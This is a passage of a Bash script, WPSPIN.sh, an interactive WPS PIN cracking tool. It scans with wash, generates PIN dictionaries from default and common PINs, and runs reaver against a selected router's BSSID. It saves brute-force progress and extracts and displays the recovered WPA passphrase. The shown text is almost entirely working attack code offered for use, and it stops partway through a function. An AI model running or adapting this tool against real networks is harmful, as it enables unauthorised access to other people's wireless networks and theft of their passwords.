  1377.      elif [ "$ATTACK_MENUE_CHOICE" == 5 ]; then                                           # equal to "select another target"
  1378.      
  1379.        if [ "$BIG_MENUE_CHOICE" == 2 ]; then                                               # if we are in generator mode we simply close the loop and go back to the attack menu
  1380.          
  1381.          echo " "
  1382.        
  1383.        else
  1384.        
  1385.          while  [ "$ATTACK_MENUE_CHOICE" == 5 ]; do                                       # in case we want to display again the scan results  
  1386.          
  1387.                    
  1388.            WASH_SCAN                                                                          #with reload
  1389.          
  1390.            OUTPUT
  1391.          
  1392.            GENERATE
  1393.          
  1394.            ATTACK
  1395.          
  1396.          done
  1397.        
  1398.        fi                                                                            
  1399.      
  1400.      elif [ "$ATTACK_MENUE_CHOICE" == 6 ]; then                                          # option "go back to previous menu"
  1401.  
  1402.      BIG_MENUE
  1403.  
  1404.      elif [ "$ATTACK_MENUE_CHOICE" == 7 ]; then                                          # option restart/change language
  1405.  
  1406.      unset
  1407.      CLEAN
  1408.      bash WPSPIN.sh
  1409.  
  1410.      else                                                                               # option exit
  1411.      CLEAN
  1412.      CIAO
  1413.      exit 0
  1414.  
  1415.      fi
  1416. }  
  1417.  
  1418.  
  1419.  
  1420.  
  1421. BIG_MENUE(){                                                                            
  1422.  
  1423. BIG_MENUE_DISPLAY                                                                     # options of the "big menu", WPSPIN with all options available
  1424.  
  1425. if [ "$BIG_MENUE_CHOICE" == 1 ]; then                                                 # 1 is washscan = scan with wash and attack with reaver guided
  1426.  
  1427. echo ""
  1428. echo "$WASHWAIT" #####################################REDIGER SELON LANGUE######### message to advice the user that the scan is launched and result will be displayed in a while
  1429. echo ""    
  1430.  
  1431.  
  1432.  
  1433.   ifconfig $MONOTORIZED_WLAN down  #      
  1434.  
  1435.   xterm -l -lf scan.txt -e $WALSH_O_WASH -i $MON_ATTACK  -C      # this is the general sentence
  1436.  
  1437.  chmod 777 scan.txt &> /dev/null
  1438.  
  1439.  
  1440.  
  1441. if [ "$WALSH_O_WASH" == "wash" ]; then
  1442.  cat scan.txt | sed '1,6d' | grep  "........."    > wash_scan.txt
  1443.  chmod 777 wash_scan.txt
  1444.  rm scan.txt &> /dev/null
  1445.  else
  1446.  cat scan.txt | sed "1,3d" | grep  "........."    > wash_scan.txt
  1447.  chmod 777 wash_scan.txt
  1448.  rm scan.txt &> /dev/null
  1449. fi
  1450.  
  1451. WASH_SCAN
  1452.  
  1453.  
  1454.  
  1455.  
  1456. elif [ "$BIG_MENUE_CHOICE" == 2 ]; then                                              # 2 is the pin generator, the user enter manually the data bssid and essid
  1457.  
  1458.   #while [[ "$ATTACK_MENUE_CHOICE" -ne 5 ]]; do                                       # we make a while loop to maintain the process enter data - generate pin - attack menu
  1459.  
  1460.     DATASGENERADOR
  1461.     GENERATE
  1462.     OUTPUT
  1463.     ATTACK
  1464.     BIG_MENUE
  1465.  
  1466.   #done
  1467.  
  1468. elif [ "$BIG_MENUE_CHOICE" == 3 ]; then                                          # to change interface, we erase the value of the selected interface and relaunch the selection
  1469.  
  1470.   unset MON_ATTACK                                                               # of the interface
  1471.   IFACE
  1472.   BIG_MENUE
  1473.  
  1474. elif [ "$BIG_MENUE_CHOICE" == 4 ]; then                                          # restart and change language
  1475.  
  1476.   CLEAN
  1477.   bash WPSPIN.sh
  1478.  
  1479. else                                                                             # to exit script
  1480.  
  1481. CLEAN
  1482.   CIAO
  1483.   exit 0
  1484.  
  1485. fi
  1486.  
  1487. exit
  1488. }
  1489.  
  1490.  
  1491. recursive_generator()                                     # This function was created by Spaw from crack-wifi.com and generously given
  1492. {                                                         # Thanks you Spawn :)
  1493.     if (($1 == 0))                                        
  1494.     then
  1495.          echo $2
  1496.     else
  1497.         for car in 0 1 2 3 4 5 6 7 8 9;                                      
  1498.         do
  1499.             recursive_generator $(($1 - 1)) $2$car                            
  1500.         done                                                                  
  1501.     fi                                                                        
  1502. }                                                         # end of the function "recursive_generator"
  1503.  
  1504.  
  1505.  
  1506.  
  1507.  
  1508. SEQUENCEFIRST()                                                # We create the sequence withe the selected PIN range ( first half )
  1509. {
  1510. if [ "$INICIOSEQUENCEFIRST" -gt "$FINSEQUENCEFIRST" ]; then     # if end sequence is < to the beginning
  1511.   for i in $(seq $FINSEQUENCEFIRST $INICIOSEQUENCEFIRST)  ;    # we change the order of the value for the seq command          
  1512.     do
  1513.       printf '%04d\n' $i                                      # zero padding                  
  1514.   done | tac  2> /dev/null                                     # and we reverse the result
  1515. else
  1516.   for i in $(seq $INICIOSEQUENCEFIRST $FINSEQUENCEFIRST)  ;             # if the sequence is incremental
  1517.     do
  1518.       printf '%04d\n' $i                                      # we give straight the seq command result                
  1519.   done 2> /dev/null
  1520. fi
  1521. }
  1522.  
  1523.  
  1524.  
  1525.  
  1526.  
  1527. SEQUENCESECOND()
  1528. {
  1529. if [ "$INICIOSEQUENCESECOND" -gt "$FINSEQUENCESECOND" ]; then       # if end sequence is < to the beginning
  1530.   for i in $(seq $FINSEQUENCESECOND $INICIOSEQUENCESECOND)  ;    # we change the order of the value for the seq command          
  1531.     do
  1532.       printf '%03d\n' $i                                      # zero padding                  
  1533.   done | tac  2> /dev/null                                     # and we reverse the result
  1534. else
  1535. for i in $(seq $INICIOSEQUENCESECOND $FINSEQUENCESECOND)  ;       # We create the sequence withe the selected PIN range ( second half )
  1536.     do
  1537.       printf '%03d\n' $i                                      # zero padding in case the beginning sequence is < 100                
  1538.   done 2> /dev/null
  1539. fi
  1540. }
  1541.  
  1542.  
  1543.  
  1544. BASICPINGENERATOR()                                            # We generate a PIN dictionary started with default PIN, then known generic PIN
  1545. {
  1546. echo "$FIRSTHALFSESSION"
  1547. SEQUENCEFIRST 2> /dev/null
  1548. echo "$STARTSELECTEDPIN
  1549. $PART1
  1550. $STARTPIN
  1551. $STARTPIN2
  1552. $STARTPIN3
  1553. $STARTPIN4
  1554. $STARTPIN5
  1555. $STARTPIN6
  1556. $STARTPIN7
  1557. $STARTPIN8
  1558. 1234
  1559. 1186
  1560. 8847
  1561. 1883
  1562. 2017
  1563. 1653
  1564. 1670
  1565. 1835
  1566. 8820
  1567. 7376
  1568. 4329
  1569. 1975
  1570. 1340
  1571. 2032
  1572. 4394
  1573. 4739"
  1574. recursive_generator 4
  1575. echo "$SECONDHALFSESSION"
  1576. SEQUENCESECOND 2> /dev/null
  1577. echo "$ENDSELECTEDPIN
  1578. $PART2
  1579. $ENDPIN
  1580. $ENDPIN2
  1581. $ENDPIN3
  1582. $ENDPIN4
  1583. $ENDPIN5
  1584. $ENDPIN6
  1585. $ENDPIN7
  1586. $ENDPIN8
  1587. 567
  1588. 642
  1589. 876
  1590. 648
  1591. 252
  1592. 806
  1593. 273
  1594. 560
  1595. 290
  1596. 705
  1597. 791
  1598. 696
  1599. 970
  1600. 976
  1601. 455
  1602. 271"  
  1603. recursive_generator 3
  1604. }
  1605.  
  1606.  
  1607.  
  1608.  
  1609.  
  1610.  
  1611. WPCGENERATOR(){
  1612.  
  1613. STARTSELECTEDPIN=$( echo "$SELECTEDPIN" | cut -b -4 )    # We cut the selected PIN in half
  1614. ENDSELECTEDPIN=$( echo "$SELECTEDPIN" | cut -b 5-7 )
  1615. STARTPIN=$( echo "$PIN" | cut -b -4 )                 # We cut the default PIN in two half and take away the checksum in the second half
  1616. ENDPIN=$( echo "$PIN" | cut -b 5-7 )
  1617. STARTPIN2=$( echo "$PIN2" | cut -b -4 )                  # and do until the 8th default PIN ( maximum with AdbBroadband PDG4100N )
  1618. ENDPIN2=$( echo "$PIN2" | cut -b 5-7 )
  1619. STARTPIN3=$( echo "$PIN3" | cut -b -4 )
  1620. ENDPIN3=$( echo "$PIN3" | cut -b 5-7 )
  1621. STARTPIN4=$( echo "$PIN4" | cut -b -4 )
  1622. ENDPIN4=$( echo "$PIN4" | cut -b 5-7 )
  1623. STARTPIN5=$( echo "$PIN5" | cut -b -4 )
  1624. ENDPIN5=$( echo "$PIN5" | cut -b 5-7 )
  1625. STARTPIN6=$( echo "$PIN6" | cut -b -4 )
  1626. ENDPIN6=$( echo "$PIN6" | cut -b 5-7 )
  1627. STARTPIN7=$( echo "$PIN7" | cut -b -4 )
  1628. ENDPIN7=$( echo "$PIN7" | cut -b 5-7 )
  1629. STARTPIN8=$( echo "$PIN8" | cut -b -4 )
  1630. ENDPIN8=$( echo "$PIN8" | cut -b 5-7 )
  1631.  
  1632.  
  1633. unset HEAD1 2> /dev/null
  1634. unset HEAD2 2> /dev/null
  1635. unset HEAD3 2> /dev/null
  1636.  
  1637.  
  1638. BSSIDSINPUNTOS=$(echo "$BSSID" | tr -d ':')
  1639. WPCNAME=$(echo "$BSSIDSINPUNTOS.wpc")                                # the name of the wpc file calling previous variable CHECKBSSID
  1640.  
  1641. HEAD1=$( cat "$DIRECTORY/$WPCNAME" 2> /dev/null | awk NR==1)                # the first value of the wpc header                    
  1642. HEAD2=$( cat "$DIRECTORY/$WPCNAME" 2> /dev/null | awk NR==2)                # the second value of the wpc header
  1643. HEAD3=$( cat "$DIRECTORY/$WPCNAME" 2> /dev/null | awk NR==3)                # the third value of the wpc header
  1644.  
  1645.  
  1646.  
  1647.  
  1648.  
  1649. ls "$DIRECTORY/$WPCNAME"  &> /dev/null                                # by this condition we check if there is already a session named bssid.wpc for the
  1650.                                                          # objective. If there is not we will activate the generators to create it
  1651.   if [ $? -ne 0 ] || [ "$HEAD1" == "0" ] || [ -z $HEAD3 ]   ; then   # if there is no wpc session, or if no pin has been tried, or if it
  1652.  
  1653. HEAD1=0
  1654. HEAD2=0
  1655. HEAD3=0
  1656.  
  1657. HEADER=$( echo "$HEAD3
  1658. $HEAD2
  1659. $HEAD1" )                                    # header with value 0
  1660.                                             # is corrupted, we will use 0 0 0 as a header
  1661.  
  1662.    else
  1663.  
  1664. HEADER=$( echo "$HEAD3
  1665. $HEAD2
  1666. $HEAD1" )                                    # otherwise we grab the older headers
  1667.  
  1668.   fi
  1669.  
  1670.  
  1671.  
  1672. if (( "$HEAD1" >> 0 )) 2> /dev/null &&  [[ "$HEAD3" == "0" ]] 2> /dev/null ; then     # MAYBE???? in case we didn't get the first half but tried already some PIN, for avoiding issue with M6 we will always keep one PIN less - or make a rectify function..
  1673.        
  1674.      INDICEPIN=`expr 3 '+' $HEAD1`                          # we add three to the the value of $HEAD3
  1675.        
  1676.      BADHALFPIN=$( cat "$DIRECTORY/$WPCNAME" | awk NR==$INDICEPIN)      # and take the line in our wpc session that the last PIN tried (unsuccessful)
  1677.        
  1678.      FIRSTHALFSESSION=$( head -$INDICEPIN "$DIRECTORY/$WPCNAME" | tail -n+4 )  # that is our beginning of session ( first half)
  1679.  
  1680.  
  1681.      
  1682. elif (( "$HEAD1" >> 0 )) 2> /dev/null &&  [[ "$HEAD3" == "1" ]] 2> /dev/null ; then  # in case we did get the first half of the PIN
  1683.  
  1684.      INDICEPIN=`expr 3 '+' $HEAD1`
  1685.  
  1686.      INDICEPIN3=`expr 1 '+' $INDICEPIN`  #if we get the first half we store the half that come after the indicated PIN, she is the good one
  1687.  
  1688.      GOODHALFPIN=$( cat "$DIRECTORY/$WPCNAME" | awk NR==$INDICEPIN3)     # We store it as GOODHALPIN
  1689.  
  1690.      FIRSTHALFSESSION=$( head -$INDICEPIN3 "$DIRECTORY/$WPCNAME" | tail -n+4 )  # that is our beginning of session ( first half)
  1691.  
  1692.      INDICEPIN2=`expr 10003 '+' $HEAD2`
  1693.  
  1694.        
  1695.      INDICEPIN4=`expr 1 '+' $INDICEPIN2`
  1696.  
  1697.      INDICEPINVICTORY=`expr 1 '+' $INDICEPIN4`
  1698.      
  1699.      SECONDHALFSESSION=$( head -$INDICEPIN2 "$DIRECTORY/$WPCNAME" | tail -n+10004 )  # that is our beginning of session ( second half)
  1700.      
  1701.      BADSECONDHALFPIN=$( cat "$DIRECTORY/$WPCNAME" | awk NR==$INDICEPIN2)
  1702.  
  1703. elif (( "$HEAD1" >> 0 )) 2> /dev/null &&  [[ "$HEAD3" == "2" ]] 2> /dev/null ; then  # in case we did get the PIN
  1704.  
  1705.     INDICEPIN=`expr 3 '+' $HEAD1`
  1706.  
  1707.      INDICEPIN3=`expr 1 '+' $INDICEPIN`  #if we get the first half we store the half that come after the indicated PIN, she is the good one
  1708.  
  1709.      GOODHALFPIN=$( cat "$DIRECTORY/$WPCNAME" | awk NR==$INDICEPIN3)     # We store it as GOODHALPIN
  1710.  
  1711.      FIRSTHALFSESSION=$( head -$INDICEPIN3 "$DIRECTORY/$WPCNAME" | tail -n+4 )  # that is our beginning of session ( first half)
  1712.  
  1713.      INDICEPIN2=`expr 10003 '+' $HEAD2`
  1714.  
  1715.      
  1716.    
  1717.      INDICEPIN4=`expr 1 '+' $INDICEPIN2`
  1718.  
  1719.      INDICEPINVICTORY=`expr 1 '+' $INDICEPIN4`
  1720.      
  1721.      SECONDHALFSESSION=$( head -$INDICEPIN2 "$DIRECTORY/$WPCNAME" | tail -n+10004 )  # that is our beginning of session ( second half)
  1722.      
  1723.      BADSECONDHALFPIN=$( cat "$DIRECTORY/$WPCNAME" | awk NR==$INDICEPIN2)
  1724.  
  1725. fi
  1726.  
  1727. rm -r  /tmp/brouillon.wpc  2> /dev/null                                        # delete brouillon.wpc
  1728. rm /tmp/brouillon.wpc 2> /dev/null
  1729.  
  1730. if [ "$ATTACK_MENUE_CHOICE" == 2 ] || [ "$ATTACK_MENUE_CHOICE" == 3 ]; then    # to cumulate verious sequence
  1731.  
  1732.   PART1=$( head -10003 "$DIRECTORY/$WPCNAME" | tail -n+4 )
  1733.   PART2=$( cat "$DIRECTORY/$WPCNAME" | tail -n+10004 )
  1734.  
  1735. fi
  1736.  
  1737.  
  1738.  
  1739. BASICPINGENERATOR > /tmp/brouillon.wpc                     # We generate the PIN dictionary
  1740.  
  1741. sed 's/^ *//; s/ *$//; /^$/d' /tmp/brouillon.wpc >> /tmp/brouillon2.wpc # removing blanks line, trailing and leading blank
  1742.  
  1743. rm -r  /tmp/brouillon.wpc                                          # delete brouillon.wpc
  1744.  
  1745. awk '!array_temp[$0]++'  /tmp/brouillon2.wpc >> /tmp/brouillon.wpc  # removing all duplicated values
  1746.  
  1747. rm -r  /tmp/brouillon2.wpc                                         # delete brouillon2.wpc
  1748.  
  1749. tac /tmp/brouillon.wpc >> /tmp/brouillon2.wpc
  1750.  
  1751. rm -r  /tmp/brouillon.wpc
  1752.  
  1753. echo "$HEADER" >> /tmp/brouillon2.wpc
  1754.  
  1755.  
  1756. chmod 777 "$DIRECTORY/$WPCNAME" 2> /dev/null
  1757.  
  1758. rm "$DIRECTORY/$WPCNAME" 2> /dev/null
  1759.  
  1760. tac /tmp/brouillon2.wpc >> "$DIRECTORY/$WPCNAME"
  1761.  
  1762. chmod 777 "$DIRECTORY/$WPCNAME" 2> /dev/null
  1763.  
  1764. rm -r  /tmp/brouillon2.wpc                                         # delete brouillon2.wpc
  1765.  
  1766.  
  1767. echo "$HEAD1
  1768. $HEAD2
  1769. $HEAD3" > "$DIRECTORY/vigilate.txt"
  1770.  
  1771. unset INICIOSEQUENCEFIRST ############################# TEST, to delete the old values entered just after making the file
  1772. unset FINSEQUENCEFIRST
  1773. unset INICIOSEQUENCESECOND
  1774. unset FINSEQUENCESECOND
  1775. unset SELECTEDPIN
  1776. unset FIRSTHALFSESSION
  1777. unset SECONDHALFSESSION
  1778. unset PART1
  1779. unset PART2
  1780. }
  1781.  
  1782.  
  1783. CLEAN(){
  1784. unset BIG_MENUE_CHOICE
  1785. unset BSSID
  1786. unset ESSID
  1787. unset UNKNOWN
  1788. unset ATTACK_MENUE_CHOICE
  1789. unset PIN
  1790. unset MODEL
  1791. unset APRATE
  1792. unset SPECIAL
  1793. airmon-ng stop $MON_ATTACK &> /dev/null
  1794. rm /tmp/Interface.txt &> /dev/null
  1795. rm /tmp/airmon.txt &> /dev/null
  1796. rm /tmp/second_scan.txt &> /dev/null
  1797. rm wash_scan.txt &> /dev/null
  1798. rm attack.txt &> /dev/null
  1799. rm vigilate.txt &> /dev/null
  1800. }
  1801.  
  1802.  
  1803.  
  1804.  
  1805.  
  1806. PRIMARY_CHECK(){                                                     # We need to be toot to use reaver and in order to not erase
  1807.                                                                     # previous wpc session, WPSPIN need to be executed in its directory
  1808.                                                                    # so we put to until to loop that will be use at start
  1809. DIRECTORYCHECK=$( pwd | rev | cut -d "/" -f1 | rev )                        # check if we are in the good directory, WPSPIN
  1810.  
  1811.  
  1812. until  [ "$DIRECTORYCHECK" == "WPSPIN" ];                                            
  1813.  
  1814.   do                                
  1815.   echo "$DIRECTORY_ADVERTENCIA"                                                     #
  1816.   SHORTMENUE                                       ###################################### change according to selected language
  1817.  
  1818. done
  1819.  
  1820.  
  1821.  
  1822. ROOTCONTROL=$(whoami)                                                        # This variable will be used if the user is logged as root
  1823.  
  1824. until  [ "$ROOTCONTROL" == "root" ];                                            
  1825.  
  1826.   do                                
  1827.   echo "$ROOT_ADVERTENCIA"                                                     #
  1828.   SHORTMENUE                                       ###################################### change according to selected language
  1829.  
  1830. done
  1831.  
  1832. DIRECTORY=$(pwd)
  1833.  
  1834. }
  1835.  
  1836.  
  1837.  
  1838.  
  1839. REGENERATE(){                     # This function will create a new header for the *.wpc file in order to save reaver progress
  1840.                                 # We will use $WPCNAME declared previously in WPCGENERATOR ( name of the wpc fie for the target)
  1841.                                                                   # the log of the attack named "attack.txt"
  1842.  
  1843.  
  1844.  
  1845.  
  1846. HEAD1=$( cat "$DIRECTORY/$WPCNAME" 2> /dev/null | awk NR==1)                # the first value of the wpc header                    
  1847. HEAD2=$( cat "$DIRECTORY/$WPCNAME" 2> /dev/null | awk NR==2)                # the second value of the wpc header
  1848. HEAD3=$( cat "$DIRECTORY/$WPCNAME" 2> /dev/null | awk NR==3)                # the third value of the wpc header
  1849.  
  1850.  
  1851.  
  1852. #rm $DIRECTORY/cleanattack.txt &> /dev/null                                      # in case a previous log is still there
  1853. #awk '!array_temp[$0]++' $DIRECTORY/attack.txt >> $DIRECTORY/cleanattack.txt             # we grab the lock attack and take away the       duplicated values, not necessary but i am not sure and easier to see what happen
  1854.  
  1855.  
  1856.   declare -a PASSEDPIN                           # this array is for the full PIN that have been tried                      
  1857.   declare -a PASSEDFIRSTHALF                     # this one for the first half of PIN tried
  1858.   declare -a PASSEDSECONDHALF                    # this one for the second half
  1859.  
  1860.     for i in 'PASSEDPIN' 'PASSEDFIRSTHALF' 'PASSEDSECONDHALF' ;                                
  1861.       do
  1862.        count=1          
  1863.          if [ "$i" == "PASSEDPIN" ]; then                                                        
  1864.            while read -r line; do                                                            
  1865.              PASSEDPIN[${count}]="$line"                                                            
  1866.              count=$((count+1))
  1867.            done < <( cat "$DIRECTORY/attack.txt" | grep -a "Trying pin" | awk -F' ' '{ print $4 }' | uniq )
  1868.          elif  [ "$i" == "PASSEDFIRSTHALF" ]; then
  1869.            while read -r line; do                                                          
  1870.              PASSEDFIRSTHALF[${count}]="$line"                                                            
  1871.              count=$((count+1))
  1872.            done < <( cat "$DIRECTORY/attack.txt" | grep -a "Trying pin" | awk -F' ' '{ print $4 }' | cut -b -4 | uniq )
  1873.          elif  [ "$i" == "PASSEDSECONDHALF" ]; then
  1874.             while read -r line; do                                                            
  1875.              PASSEDSECONDHALF[${count}]="$line"                                                            
  1876.              count=$((count+1))
  1877.             done < <( cat "$DIRECTORY/attack.txt" | grep -a "Trying pin" | awk -F' ' '{ print $4 }' | cut -b 5-7 | uniq )
  1878.          fi    
  1879.     done
  1880.  
  1881.  
  1882.  
  1883.  
  1884. CONCRETISED=${#PASSEDPIN[*]}                             #  index of first array ( full pin tried ) as a variable
  1885. PREMIEREMOITIE=$(echo ${#PASSEDFIRSTHALF[*]})            # idem for second array (first half )
  1886. DEUXIEMEMOITIE=${#PASSEDSECONDHALF[*]}                   # idem for the third (second half )
  1887.  
  1888.  
  1889. CHECKHEAD1=$( cat "$DIRECTORY/vigilate.txt" 2> /dev/null | awk NR==1)  # this is to check if reaver wrote the progress or not
  1890. CHECKHEAD2=$( cat "$DIRECTORY/vigilate.txt" 2> /dev/null | awk NR==2)
  1891. CHECKHEAD3=$( cat "$DIRECTORY/vigilate.txt" 2> /dev/null | awk NR==3)
  1892.  
  1893. if [ "$CHECKHEAD1" -eq "$HEAD1" ] && [ "$CHECKHEAD2" -eq "$HEAD2" ] && [ "$CHECKHEAD3" -eq "$HEAD3" ] && (( "$CONCRETISED" >> 1 ))  && [[ "$DEUXIEMEMOITIE" == "1" ]] ; then  # if first half PIN has NOT been passed successfully
  1894.  
  1895.  
  1896.            
  1897.            
  1898.            NEWHEAD1=`expr $HEAD1 '+' $PREMIEREMOITIE '-' 1`
  1899.            NEWHEAD2=$( echo "$HEAD2")
  1900.            NEWHEAD3=$( echo "$HEAD3")
  1901.            
  1902.  
  1903.  
  1904. echo "$NEWHEAD1
  1905. $NEWHEAD2
  1906. $NEWHEAD3" > "$DIRECTORY/newheader.wpc"                   # this is our new header
  1907.  
  1908.  
  1909. tail -n +4 "$DIRECTORY/$WPCNAME" >> "$DIRECTORY/newheader.wpc"     # we take away the three first line of the wpc session ( the header )
  1910.  
  1911. rm "$DIRECTORY/$WPCNAME"                                      # we delete our former wpc session
  1912.  
  1913. cat "$DIRECTORY/newheader.wpc" >> "$DIRECTORY/$WPCNAME"         # and replace it for the session with new header, progress is saved :)
  1914.  
  1915. rm  "$DIRECTORY/newheader.wpc"  &> /dev/null                  # we delete the new header
  1916.  
  1917. chmod 777 "$DIRECTORY/$WPCNAME"
  1918.  
  1919.  
  1920.  
  1921.  
  1922.          
  1923.           elif [ "$CHECKHEAD1" -eq "$HEAD1" ] && [ "$CHECKHEAD2" -eq "$HEAD2" ] && [ "$CHECKHEAD3" -eq "$HEAD3" ] && (( "$CONCRETISED" >> 1 )) && (( "$DEUXIEMEMOITIE" >> 1 )) ; then  # if the second half has been made successfully
  1924.  
  1925.            
  1926.            
  1927.            NEWHEAD1=`expr $HEAD1 '+' $PREMIEREMOITIE '-' 1`
  1928.            NEWHEAD2=`expr $HEAD2 '+' $DEUXIEMEMOITIE '-' 1`
  1929.            NEWHEAD3=1
  1930.            
  1931.  
  1932. echo "$NEWHEAD1
  1933. $NEWHEAD2
  1934. $NEWHEAD3" > "$DIRECTORY/newheader.wpc"                   # this is our new header
  1935.  
  1936.  
  1937. tail -n +4 "$DIRECTORY/$WPCNAME" >> "$DIRECTORY/newheader.wpc"     # we take away the three first line of the wpc session ( the header )
  1938.  
  1939. rm "$DIRECTORY/$WPCNAME"                                      # we delete our former wpc session
  1940.  
  1941. cat "$DIRECTORY/newheader.wpc" >> "$DIRECTORY/$WPCNAME"         # and replace it for the session with new header, progress is saved :)
  1942.  
  1943. rm  "$DIRECTORY/newheader.wpc"  &> /dev/null                  # we delete the new header
  1944.  
  1945. chmod 777 "$DIRECTORY/$WPCNAME"
  1946.  
  1947.  
  1948. fi  
  1949.  
  1950.  
  1951. unset NEWHEAD1                                              # we unset the new heads
  1952. unset NEWHEAD2
  1953. unset NEWHEAD3
  1954. unset HEAD1
  1955. unset HEAD2
  1956. unset HEAD3
  1957. unset PASSEDPIN
  1958. unset PASSEDFIRSTHALF
  1959. unset PASSEDSECONDHALF
  1960. unset CONCRETISED
  1961. unset PREMIEREMOITIE
  1962. unset DEUXIEMEMOITIE
  1963. unset CHECKHEAD1
  1964. unset CHECKHEAD2
  1965. unset CHECKHEAD3
  1966. unset SELECTEDPIN
  1967.  
  1968. #rm -r $DIRECTORY/cleanattack.txt                         # We delete cleanattack.txt we don't need it
  1969.  
  1970. }
  1971.  
  1972.  
  1973.  
  1974.  
  1975. ATTACK_ATTACK()                                                         # for not writing several time the same code, the same attack
  1976. {                                                                       # attack function will be used for all menu option
  1977.      echo ""
  1978.      echo "$STOP_REAVER"                                                  # little message saying that the attack can be stop by pressing ctrl and c
  1979.  #    ifconfig $MONOTORIZED_WLAN up 2> /dev/null ########################### TO BE REMOVED
  1980.                                                              
  1981.   if [ -n "${RT_CHECK}" ]; then                    ###### If chipset is rt series it needs to have the wlan up for the attack.
  1982.       airmon-ng stop $MON_ATTACK  &> /dev/null
  1983.       ifconfig $MONOTORIZED_WLAN down &> /dev/null   ###### other chipset works better with the wlan down.
  1984.       MON_ATTACK=$( airmon-ng start $MONOTORIZED_WLAN | grep enabled |  awk -F' ' '{ print $5 }' |  sed -e 's/)//g' ) &>/dev/null
  1985.       ifconfig $MONOTORIZED_WLAN up &> /dev/null
  1986.   fi
  1987.  
  1988.  
  1989.         if [ "$BIG_MENUE_CHOICE" == 1 ]; then                             # If we have the scan mode we can give the canal in our reaver attack
  1990.  
  1991.            if [ -z "${REAVERCOMMAND}" ]; then
  1992.            reaver -b $BSSID -i $MON_ATTACK -s "$DIRECTORY/$WPCNAME" -vv -c $CHANNEL -n   | tee attack.txt    # we put some delay everywhere for not stressing too much AP - for now not that the code   "-d 2 -t 2 -T 2"
  1993.            chmod 777 "$DIRECTORY/attack.txt"
  1994.            else
  1995.            reaver -b $BSSID -i $MON_ATTACK -s "$DIRECTORY/$WPCNAME" $REAVERCOMMAND | tee attack.txt
  1996.            chmod 777 "$DIRECTORY/attack.txt"
  1997.            unset REAVERCOMMAND
  1998.            fi
  1999.        else                                                      # if not we don't put canal
  2000.            if [ -z "${REAVERCOMMAND}" ]; then        
  2001.             reaver -b $BSSID -i $MON_ATTACK -s "$DIRECTORY/$WPCNAME" -n -vv | tee attack.txt
  2002.             chmod 777 "$DIRECTORY/attack.txt"
  2003.             else
  2004.             reaver -b $BSSID -i $MON_ATTACK -s "$DIRECTORY/$WPCNAME" $REAVERCOMMAND | tee attack.txt
  2005.            chmod 777 "$DIRECTORY/attack.txt"
  2006.            unset REAVERCOMMAND
  2007.            fi
  2008.        fi
  2009.  
  2010.                                                
  2011.  
  2012.      VICTORY_PIN=$(cat  attack.txt | grep "WPS PIN" | cut -d ":" -f2- | cut -c3- | rev | cut -c2- | rev)  # in case the key is found we grep the PIN
  2013.      KEY=$(cat  attack.txt | grep "WPA PSK" | cut -d ":" -f2- | cut -c3- | rev | cut -c2- | rev)          # and the WPAPASSPHRASE that will be our variable KEY    
  2014.                                                                                 # we erase the log
  2015.        if [ "$KEY"  == "" ]; then                                                                              # if no passphrase is recovered than
  2016.            
  2017.            echo ""
  2018.            echo "$FAILED"                                                                                      # failed display a message
  2019.            echo ""
  2020.            
  2021.            REGENERATE # We call the function to eventually keep the reaver progress in *.wpc file
  2022.  
  2023.        else
  2024.          
  2025.        
  2026.           echo -e " $blanco  WPA$colorbase>>> $rojo $KEY $colorbase "                                           # otherwise appears a success message
  2027.           echo "$KEY_FOUND"
  2028.           echo "                                                                                                
  2029.        
  2030.     KEY FOUND!!! XD
  2031.  
  2032.    
  2033.        WPA >>>>>>   $KEY
  2034.  
  2035.  ESSID    >   $ESSID
  2036.  BSSID    >   $BSSID
  2037.  PIN      >   $VICTORY_PIN
  2038.  WPA      >   $KEY
  2039.        
  2040.  
  2041.        WPA >>>>>>   $KEY          
  2042.  
  2043.  
  2044.  
  2045. WPSPIN for linux   www.crack.wifi.com  wwww.lampiweb.com  www.auditoriaswireless.net
  2046.  
  2047. " > $ESSID.txt                                                                                                # data are saved in a little text
  2048.         echo -e "                        $azulfluo        $ESSID.txt  $colorbase"
  2049.         echo ""
  2050.         echo -e "ESSID    >  $blanco  $ESSID  $colorbase "
  2051.         echo -e "BSSID    >  $blanco  $BSSID  $colorbase "
  2052.         echo -e "PIN      >  $rojo  $VICTORY_PIN $colorbase "
  2053.         echo -e "WPA      >  $amarillo  $KEY $colorbase "  
  2054.        
  2055.        
  2056.        
  2057.         REGENERATE            # We call the function to keep the reaver progress in *.wpc file and in this case the key has been found
  2058.        
  2059.         sed -i '3s/.*/2/' "$DIRECTORY/$WPCNAME"  
  2060.  
  2061.        fi
  2062.  
  2063.  
  2064.  
  2065. if [[ -n `(cat attack.txt | grep -E 'Failed to initialize' )` ]];  # in case we get this error : "Failed to initialize interface"
  2066.  
  2067.   then
  2068.  
  2069.     FAILEDREAVER                                                   # TO BE WRITTEN ACCORDING TO THE LANGUAGE
  2070.  
  2071. fi                                                       # What is coming next is to seek for invalid M that have been validated by reaver
  2072.                                                 # bug that recognize has tried and not valid M that haven't been fully checked and could          # the "99,99% bug"
  2073.  
  2074.  
  2075. FAKEM6=$( cat attack.txt | grep -A3 -E 'Sending M6 message' | grep -A2 -E 'WARNING: Receive timeout occurred' | grep -A1 -E 'Sending WSC NACK' | grep -E 'Trying pin' | awk -F' ' '{ print $4 }' | cut -b 5-7 | awk NR==1 )
  2076.  
  2077. FAKEM4=$( cat attack.txt | grep -A3 -E 'Sending M4 message' | grep -A2 -E 'WARNING: Receive timeout occurred' | grep -A1 -E 'Sending WSC NACK' | grep -E 'Trying pin' | awk -F' ' '{ print $4 }' | cut -b -4 | awk NR==1 )
  2078.  
  2079.   if [[ -n "$FAKEM4" ]] ;
  2080.     then
  2081.       INDICEBADM4=$( cat "$DIRECTORY/$WPCNAME" | grep -n -E "$FAKEM4" | awk -F':' '{ print $1 }' | tr -d ':' )
  2082.       NEWLINE=`expr $INDICEBADM4 '-' 5`
  2083.       echo "$NEWHEAD1
  2084. $NEWHEAD2
  2085. $NEWLINE" > "$DIRECTORY/BACKUPfakeM4_$WPCNAME"
  2086.      cat "$DIRECTORY/$WPCNAME" | tail -n +4 >> "$DIRECTORY/BACKUPfakeM4_$WPCNAME"
  2087.  
  2088.     FAKEM4WARNING  # REDACTED ACORDING LANGUAGE
  2089.  
  2090. unset NEWLINE && unset INDICEBADM4 && unset FAKEM4
  2091.   fi
  2092.  
  2093.   if [[ -n "$FAKEM6" ]] ;
  2094.     then
